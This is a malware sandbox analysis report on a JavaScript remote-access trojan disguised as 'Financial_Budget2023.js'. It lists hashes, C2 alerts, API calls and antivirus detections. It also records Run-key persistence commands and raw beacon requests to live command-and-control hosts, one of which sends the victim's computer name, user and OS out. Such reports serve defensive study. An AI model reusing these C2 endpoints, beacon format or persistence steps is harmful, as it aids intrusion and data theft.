Summary | ZeroBOX

Financial_Budget2023.js

Category: FILE
Machine: s1_win7_x6401
Started: July 12, 2023, 10:01 a.m.
Completed: July 12, 2023, 10:03 a.m.
Size 2.7MB
Type ASCII text, with very long lines, with no line terminators
MD5 9b5b8fd2b485387fb5e16a6a714ff3c6
SHA256 da4d5278e075f30fc53f3eba042c71b265efa501a52096531abc8d076ca44d6a
CRC32 68A09BF5
ssdeep 24576:a6mrz838IuU0y8OdUS2iFWjQ0NucSdvB7+5IFeKyksIYaXjTzXTR/WCxrmjtkAb4:3
Yara None matched

Name Response Post-Analysis Lookup
jemyy.theworkpc.com 109.248.144.235
IP Address Status Action
109.248.144.235 Active Moloch
139.177.146.165 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49198 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49191 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49198 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49191 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49202 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49202 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49201 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49201 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49194 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49194 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49195 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49195 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

(the GetComputerNameW call above, with identical arguments and result, is recorded 50 times in this table)
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2748
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0
description wscript.exe tried to sleep 180 seconds, actually delayed analysis time by 180 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3250861
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

(21 further GetDiskFreeSpaceW calls follow with the same sectors_per_cluster, bytes_per_sector, root_path, total_number_of_clusters and status/return/repeated values; they differ only in number_of_free_clusters, which in order is: 3250858, 3250851 x5, 3250819, 3230170 x2, 3250767 x2, 3250639 x2, 3250633 x6, 3250632 x2)
file C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js
MicroWorld-eScan JS:Trojan.Cryxos.12935
FireEye JS:Trojan.Cryxos.12935
VIPRE JS:Trojan.Cryxos.12935
BitDefender JS:Trojan.Cryxos.12935
Emsisoft JS:Trojan.Cryxos.12935 (B)
MAX malware (ai score=82)
Arcabit JS:Trojan.Cryxos.D3287
GData JS:Trojan.Cryxos.12935
ALYac JS:Trojan.Cryxos.12935
wmi select * from win32_logicaldisk
host 139.177.146.165
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

(the InternetCrackUrlW/HttpOpenRequestW pair above is recorded 13 times with identical arguments and results)

InternetCrackUrlW

url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

(the InternetCrackUrlW/HttpOpenRequestW pair above is recorded 12 times with identical arguments and results)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
(each of the two reg_key entries above is recorded 24 times, alternating HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE, with identical values)
wmi select * from antivirusproduct
wmi select * from win32_operatingsystem
wmi select * from win32_logicaldisk
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

send

buffer: !
socket: 1000
sent: 1
1 1 0

(the InternetCrackUrlW/HttpOpenRequestW/send sequence above is recorded 13 times with identical arguments and results)

InternetCrackUrlW

url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1096
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 12/7/2023|JavaScript Accept-Encoding: gzip, deflate Host: 139.177.146.165:4848 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1156
sent: 313
1 313 0

send

buffer: !
socket: 1096
sent: 1
1 1 0

InternetCrackUrlW

url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1096
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 12/7/2023|JavaScript Accept-Encoding: gzip, deflate Host: 139.177.146.165:4848 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1176
sent: 313
1 313 0

send

buffer: !
socket: 1096
sent: 1
1 1 0

InternetCrackUrlW

url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js"
parent_process wscript.exe martian_process wscript //B "C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js"
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js"
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
parent_process wscript.exe martian_process wscript //B "C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js"
parent_process wscript.exe martian_process wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
file C:\Windows\SysWOW64\wscript.exe
dead_host 192.168.56.101:49171
dead_host 192.168.56.101:49192
dead_host 192.168.56.101:49211
dead_host 192.168.56.101:49175
dead_host 192.168.56.101:49196
dead_host 192.168.56.101:49193
dead_host 192.168.56.101:49203
dead_host 192.168.56.101:49188
dead_host 192.168.56.101:49166
dead_host 192.168.56.101:49197
dead_host 192.168.56.101:49207
dead_host 192.168.56.101:49177
dead_host 192.168.56.101:49208
dead_host 192.168.56.101:49185
dead_host 192.168.56.101:49181
dead_host 192.168.56.101:49189
dead_host 192.168.56.101:49167
dead_host 192.168.56.101:49200
dead_host 192.168.56.101:49178
dead_host 192.168.56.101:49186
dead_host 192.168.56.101:49204
dead_host 109.248.144.235:5401
dead_host 192.168.56.101:49182
dead_host 192.168.56.101:49170
dead_host 192.168.56.101:49199
dead_host 192.168.56.101:49210
dead_host 192.168.56.101:49174